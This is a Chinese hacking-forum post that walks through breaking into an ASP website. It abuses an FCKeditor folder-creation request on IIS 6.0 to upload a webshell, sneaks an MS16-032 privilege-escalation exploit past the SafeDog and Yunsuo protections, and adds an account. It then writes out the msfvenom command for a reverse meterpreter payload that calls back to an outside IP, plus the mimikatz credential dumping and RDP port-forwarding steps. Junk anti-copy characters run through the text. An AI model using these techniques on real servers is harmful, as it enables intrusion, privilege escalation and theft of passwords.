找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2182|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

0 B6 g) r/ R7 w. B# H

$ l) x) a, X0 V# X& o h: S1 t s) S7 u; B6 H8 B6 b' @% f& `9 z, y ~4 U# M' w& j% K: e q. q2 a+ v* ]' o/ w `- y- H5 ?' f+ ]4 d9 T$ c6 C+ t& w) ~
" U* @1 Y! ?4 j, ]2 A6 W

+ B% a% H2 o6 @. T W" l
- A Z, D' h/ @+ }: }% t+ H
一、 利用getwebshell
- {3 d3 n' x: [5 {
; t8 r4 w! {0 L0 B
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
1 v/ M7 T/ ?. W6 u. z4 m' D7 h
7 X, R$ O. o! B; |7 ^222.png
( Z4 V! v- f6 `( b+ j6 C& H" y
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
4 J" T! l0 X7 _* ~2 X+ o+ G' w 333.png
) ~! ~0 R% l) [" \$ _# A
下面我们构造一个asp目录,如: ( R* d; r( E0 j4 k. L2 C

1 M/ `9 I: P+ V) Q, L/ l

8 f G. K4 G$ A http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 % ^# C0 I& q; A

8 m e2 F! v* w) D4 |

8 [# Q2 G' @5 q' G0 F' \ 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
- [7 r# X. p" u6 W
* l# u$ w7 C+ c1 ^/ V, T. p/ Z! H
一、 绕过安全狗云锁提权并且加账号
3 B: Y% q' ~/ S7 } 444.png
# b! v7 @ {6 s' R
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
' |# n3 e3 P# P7 Q* H
% g7 O8 x: s; a U2 E' g# a
如图:
. M" f/ t% o( R 555.png
7 F# p8 A1 }- j% B% [& K/ A( z
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
+ l3 G/ Q* Y9 @8 Q/ f0 L$ D" R
& V, ^/ g; ?' B. a! u1 d
一、 利用metasploit
: k/ Y. u6 ~/ |3 d
/ O: q( g9 l8 b1 |9 `
首先用pentestbox生成一个64位的payload如下命令
0 K' ]) ^" K0 W
1 k# A; D. d# q4 [6 bmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
' H. I7 U0 x+ e
/ u6 }3 ]6 g' {2 x" J: D& g
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
. r" f4 s- q2 p. {11.png
' y# ], T; b# H" ^4 m3 Y
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
- H% v1 ~6 `4 I6 f9 F 13.png
; E7 b0 B( O1 U! D( v( x d
下面我们来做一个监听如下命令:
# A q5 z2 ?: l: z) F$ r: l
7 X/ q) L; y( a portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
0 O, c u X# k3 i18.png
# F0 l) t- L8 u, v: d; \

9 s4 w/ N& C* U7 d b
& t' L( B j& f c

. R t) E: {2 N' ]( ]0 A( V5 O

8 U7 E+ R8 n9 V, I9 M$ G
. A& ?& O( _& R! M, E
% _0 i+ ]: r4 h( D k' m
$ J0 e1 x9 [2 P" ]% W

4 M9 l( x5 [, D
8 k. W0 M$ P" q( F# K! Q: V c3 l5 `/ F1 j% g4 F- {

8 s2 }1 G- [ a2 i: Y) R( K
" \9 b' ]6 m4 U2 ~

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表